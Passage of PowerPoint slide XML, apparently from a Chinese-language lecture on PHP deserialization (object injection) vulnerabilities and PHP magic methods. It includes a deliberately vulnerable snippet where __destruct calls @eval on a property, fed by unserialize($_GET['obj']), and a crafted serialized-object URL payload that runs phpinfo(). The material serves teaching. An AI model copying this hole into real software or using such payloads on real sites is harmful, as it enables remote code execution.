            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>反序列化漏洞</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911424" y="1725578"/>
            <a:ext cx="4824536" cy="3904339"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"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反序列化漏洞又叫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"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对象注入漏洞。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRP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在一个应用中，如果传给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>unserialize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"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的参数是用户可控的，那么攻击者就可以通过传入一个精心构造的序列化字符串，利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"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魔术方法来控制对象内部的变量甚至是函数。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRP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对这一类漏洞的利用，往往需要分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"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应用的源代码。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{256161F4-766C-C824-AC32-447B970A69C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6313488" y="1058913"/>
            <a:ext cx="5111750"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03FC34DC-A083-3365-0CC1-4B97B53F3666}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384032" y="1713188"/>
            <a:ext cx="5034025" cy="4339650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>有一类特殊的方法，它们以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>__(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>两个下划线</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开头，在特定的条件下会被调用。例如类的构造方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>construct()</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它在实例化类的时候会被调用。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>__construct()//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>创建对象时触发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destruct() //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>对象被销毁时触发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call() //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>在对象上下文中调用不可访问的方法时触发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err="1">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>callStatic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"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在静态上下文中调用不可访问的方法时触发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get() //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>用于从不可访问的属性读取数据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set() //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>用于将数据写入不可访问的属性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err="1">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"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在不可访问的属性上调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"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或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>empty()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>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unset() //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>在不可访问的属性上使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>unset()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>时触发 </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__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>invoke() //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>当脚本尝试将对象调用为函数时触发</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE282FC9-80D1-70CE-3199-A94FDF919ED0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6457095" y="1155219"/>
            <a:ext cx="4824536" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>魔术方法</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949786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666569-C61F-C7C9-9F98-24F47BDB2E1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="692696"/>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latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>       反序列化漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05227216-9298-D6C7-28C5-CCD86BB64F05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6741368"/>
            <a:ext cx="12192000" cy="116632"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004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36D4B131-9145-70B2-D459-8D1562DD0E27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="773944" y="1052513"/>
            <a:ext cx="4022318" cy="5256212"/>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E8C699-A77C-3E53-9C84-CB15CBDB5D3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911424" y="1155219"/>
            <a:ext cx="3528392"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反序列化漏洞</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34F9780-0674-44A0-FF7F-C80FD400A950}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="773943" y="1725578"/>
            <a:ext cx="4022319" cy="2246769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t> test{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t> $str = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>aaa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>    function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t> __destruct(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>      @eval(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>$this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>-&gt;str);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>var_dump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>unserialize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>($_GET[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>'obj'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>]));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{256161F4-766C-C824-AC32-447B970A69C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5088534" y="1058913"/>
            <a:ext cx="6336704" cy="5249811"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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03FC34DC-A083-3365-0CC1-4B97B53F3666}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5015880" y="1725578"/>
            <a:ext cx="6621791" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>test.php?obj</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=O:4:"test":1:{s:3:"str";s:10:"phpinfo();";}</a:t>
            </a:r>
            <a:endPar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E282FC9-80D1-70CE-3199-A94FDF919ED0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5084940" y="1162759"/>
            <a:ext cx="4824536" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>运行结果</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0048AA"/>
              </a:solidFill>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63E78ACD-768E-D94A-8F57-6342500EB10E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5231904" y="2476298"/>
            <a:ext cx="6047198" cy="3580935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1481928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2C91B1-245D-3264-D824-2C6B17C4E6FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5439410" y="548680"/>
            <a:ext cx="1313180" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
